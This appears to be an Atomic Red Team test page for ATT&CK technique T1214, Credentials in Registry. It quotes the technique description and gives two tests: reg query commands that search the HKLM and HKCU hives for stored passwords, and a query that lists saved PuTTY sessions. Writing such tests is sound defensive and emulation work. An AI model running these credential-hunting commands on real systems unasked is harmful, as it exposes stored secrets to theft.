# T1214 - Credentials in Registry
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1214)
<blockquote>The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>
* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code></blockquote>

## Atomic Tests

- [Atomic Test #1 - Enumeration for Credentials in Registry](#atomic-test-1---enumeration-for-credentials-in-registry)

- [Atomic Test #2 - Enumeration for PuTTY Credentials in Registry](#atomic-test-2---enumeration-for-putty-credentials-in-registry)


<br/>

## Atomic Test #1 - Enumeration for Credentials in Registry
Queries to enumerate for credentials in the Registry.

**Supported Platforms:** Windows





#### Attack Commands: Run with `command_prompt`! 


```cmd
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```






<br/>
<br/>

## Atomic Test #2 - Enumeration for PuTTY Credentials in Registry
Queries to enumerate for PuTTY credentials in the Registry.

**Supported Platforms:** Windows





#### Attack Commands: Run with `command_prompt`! 


```cmd
reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
```






<br/>
